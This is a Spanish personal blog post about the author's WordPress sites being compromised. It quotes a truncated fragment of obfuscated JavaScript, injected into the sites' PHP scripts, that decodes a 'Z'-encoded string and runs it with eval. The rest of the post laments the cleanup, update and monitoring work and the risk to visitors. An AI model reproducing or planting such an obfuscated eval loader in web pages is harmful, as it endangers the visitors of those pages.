Hola:
¿Sabeis como se llama el siguiente fragmento de codigo?
[…]+escape(vZ29+Z27;expiZ72eZ73Z3dZ27+exd.toGZ4dTZ53tZ72inZ67();Z7d;»;XXXXX for(i=0;i<s.length;i++){if(s.charAt(i)==»Z»){s1=»%»}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z());
Se llama «Tocar los cojones», hablando en plata. Os he remarcado en negrita la función que finalmente es ejecutada. Sin comentarios…
Creo que no hacen falta demasiadas palabras (es un fragmento de codigo que ha sido añadido a varios scripts de php de los blogs de mi dominio, aprovechando alguna vulnerabilidad de php y wordpress). Llevo ya toda la mañana perdida en resolver este problema, cuando la tenía reservada para continuar las entradas del blog. Podría dar la impresión de que a las personas que nos gusta escribir y compartir conocimientos, nos sobra precisamente tiempo y podemos malgastarlo en resolver dia a día las fallas de seguridad: estar continuamente pendiente de actualizar a la ultima versión (en mi caso de wordpress). Detectar los ficheros que han sido alterados con scripts similares al que os expongo al principio del post, recoger nuevos pluggins que nos permitan evaluar la seguridad del sistema, preparar scripts para monitorizar el cambio de ficheros, etc…
Y no es ya que pueda ser alterado un script de php, que puede ser cuestion de minutos localizarlo y borrar las lineas añadidas. Eso es un poco lo de menos. Es que a menudo no cambia uno, sino que tienes revisar en todos los directorios que dan acceso a las bitacoras y si deseas actualizar las versiones, tienes que hacerlo con todas ellas. Y revisar los permisos de los ficheros. Por lo que, teniendo en cuenta de que ninguno de los blogs que se encuentran alojados tiene un caracter comercial sino personal, de los que no se tiene absolutamente (y lo digo con mayusculas) ningun rendimiento económico, resulta un tanto surrealista que tengamo que dedicar nuestro tiempo a la seguridad, no ya para que pueda ser alterado el contenido del blog sino para que no puedan ser dañados los equipos de las personas que puedan visitar las páginas, que es lo que realmente a mi mas me preocupa. El contenido del blog pueden dañarlo pero existen copias de seguridad que pueden en condiciones normales ser restauradas. Pero ¿y las personas que acceden al blog?
¿Cual es la ganancia de todo este disparate?
Si alguien lo entiende que me lo explique porque yo no he llegado a entenderlo. 😦
Delphi Básico 
Deja una respuesta